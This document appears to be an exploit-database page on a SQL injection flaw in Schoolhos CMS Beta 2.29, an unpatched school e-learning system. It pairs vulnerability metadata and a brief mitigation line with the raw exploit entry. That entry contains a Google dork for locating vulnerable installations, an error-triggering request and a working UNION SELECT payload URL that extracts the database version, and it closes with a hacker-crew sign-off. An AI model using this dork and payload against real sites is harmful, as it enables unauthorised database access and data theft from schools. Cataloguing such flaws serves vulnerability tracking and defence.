header-logo
Suggest Exploit
vendor:
Schoolhos CMS
by:
Cumi++
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Schoolhos CMS
Affected Version From: Beta 2.29
Affected Version To: Beta 2.29
Patch Exists: NO
Related CWE: N/A
CPE: a:schoolhos:schoolhos_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 12.04
2012

Schoolhos CMS SQL Injections

Schoolhos is an education and e-learning CMS, have used by more school. An attacker can exploit a SQL injection vulnerability in Schoolhos CMS Beta 2.29 to execute arbitrary SQL commands by sending a specially crafted HTTP request containing malicious SQL statements.

Mitigation:

Input validation and parameterized queries can be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Schoolhos CMS SQL Injetions
# Google Dork: intext:Schoolhos Free Open Source CMS
# Date: 22 Oktober 2012
# Exploit Author: Cumi++
# Vendor Homepage: http://schoolhos.com/
# Version: Beta 2.29
# Tested on: Ubuntu 12.04
# =======================================================

Descripcion : Schoolhos is an education and e-learning CMS, have used by more school..

http://127.0.0.1/schoolhost/index.php?p=info&id='3
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/me/public_html/coretan\tema\hijau\konten.php on line 219

Exploit:
  
    SQL : SQL injection
           http://127.0.0.1/schoolhost/index.php?p=info&id='3'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--Cumi++

========================================================
Its first time..
Salam Rusuh...
Indonesian Coder, Indonesian Hacker, Pekanbaru Cyber..

Tembilahan Coder Crew.
When A Code Can Change The World